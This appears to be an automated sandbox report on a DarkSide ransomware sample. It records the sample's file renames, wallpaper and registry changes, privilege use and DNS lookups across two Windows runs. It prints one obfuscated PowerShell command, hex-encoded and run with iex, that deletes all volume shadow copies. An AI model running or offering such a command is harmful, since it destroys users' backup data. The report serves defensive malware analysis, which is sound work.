Malware Analysis Report

2024-10-16 03:30

Sample ID 220204-h4bn7sfcek
Target 58a513f83af2b326c313b41de94e8e172d538f5d4d8be71965b664ad4b260f94
SHA256 58a513f83af2b326c313b41de94e8e172d538f5d4d8be71965b664ad4b260f94
Tags
darkside ransomware spyware stealer persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

58a513f83af2b326c313b41de94e8e172d538f5d4d8be71965b664ad4b260f94

Threat Level: Known bad

The file 58a513f83af2b326c313b41de94e8e172d538f5d4d8be71965b664ad4b260f94 was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer persistence

DarkSide

Modifies extensions of user files

Sets service image path in registry

Reads user/profile data of web browsers

Sets desktop wallpaper using registry

Drops file in Windows directory

Checks processor information in registry

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies Control Panel

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-04 07:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-04 07:16

Reported

2022-02-04 07:19

Platform

win7-en-20211208

Max time kernel

145s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sample.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\RepairTest.crw.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitLimit.tiff C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\SuspendSkip.tif => C:\Users\Admin\Pictures\SuspendSkip.tif.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\InstallRequest.png => C:\Users\Admin\Pictures\InstallRequest.png.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\MountDisable.crw => C:\Users\Admin\Pictures\MountDisable.crw.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SuspendSkip.tif.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\UnlockSubmit.png => C:\Users\Admin\Pictures\UnlockSubmit.png.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\HideConvert.tif.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\InstallRequest.png.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnlockSubmit.png.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\RepairTest.crw => C:\Users\Admin\Pictures\RepairTest.crw.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitLimit.tiff => C:\Users\Admin\Pictures\SubmitLimit.tiff.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitLimit.tiff.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\HideConvert.tif => C:\Users\Admin\Pictures\HideConvert.tif.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\MountDisable.crw.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5bede5a3.BMP" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\5bede5a3.BMP" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3\ = "5bede5a3" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5bede5a3.ico" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\sample.exe

"C:\Users\Admin\AppData\Local\Temp\sample.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp

Files

memory/852-53-0x0000000075761000-0x0000000075763000-memory.dmp

memory/1680-54-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp

memory/1680-56-0x00000000026A0000-0x00000000026A2000-memory.dmp

memory/1680-57-0x00000000026A2000-0x00000000026A4000-memory.dmp

memory/1680-58-0x00000000026A4000-0x00000000026A7000-memory.dmp

memory/1680-55-0x000007FEF1F40000-0x000007FEF2A9D000-memory.dmp

memory/1680-59-0x00000000026AB000-0x00000000026CA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 dd1d6cdf13bbefe97cacae3a9af8f4aa
SHA1 1497e5159414090d1860075dc07701c6e30b59a9
SHA256 3728c38922f30689d284f3d62bff54aa82908fde6bbc3e32662ff6eea11e6035
SHA512 70c2c3444bc24245e54997857818ba09b106193f9a445f0ba6e0e34e33b8e6bd28b9a4365248fa0a9079deb9503423e1e1db9c4dcff505a01f7e3da56f367d80

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-04 07:16

Reported

2022-02-04 07:19

Platform

win10v2004-en-20220112

Max time kernel

150s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sample.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\DebugWatch.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveStop.tif => C:\Users\Admin\Pictures\ResolveStop.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\RestoreMerge.tiff => C:\Users\Admin\Pictures\RestoreMerge.tiff.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SetUninstall.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\SplitWait.crw => C:\Users\Admin\Pictures\SplitWait.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\CloseHide.tif => C:\Users\Admin\Pictures\CloseHide.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\RedoReceive.png => C:\Users\Admin\Pictures\RedoReceive.png.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\RequestRestore.crw => C:\Users\Admin\Pictures\RequestRestore.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\DebugWatch.crw => C:\Users\Admin\Pictures\DebugWatch.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\PushUndo.tiff => C:\Users\Admin\Pictures\PushUndo.tiff.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\RedoReceive.png.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResolveStop.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\RestoreMerge.tiff C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SplitWait.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\SuspendCompare.png => C:\Users\Admin\Pictures\SuspendCompare.png.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\CloseHide.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\AddNew.png.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\PushUndo.tiff C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\PushUndo.tiff.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\RequestRestore.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\RestoreMerge.tiff.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\SetUninstall.crw => C:\Users\Admin\Pictures\SetUninstall.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SuspendCompare.png.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
File renamed C:\Users\Admin\Pictures\AddNew.png => C:\Users\Admin\Pictures\AddNew.png.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Sets service image path in registry

persistence

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b787986.BMP" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b787986.BMP" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Drops file in Windows directory

Description Indicator Process Target
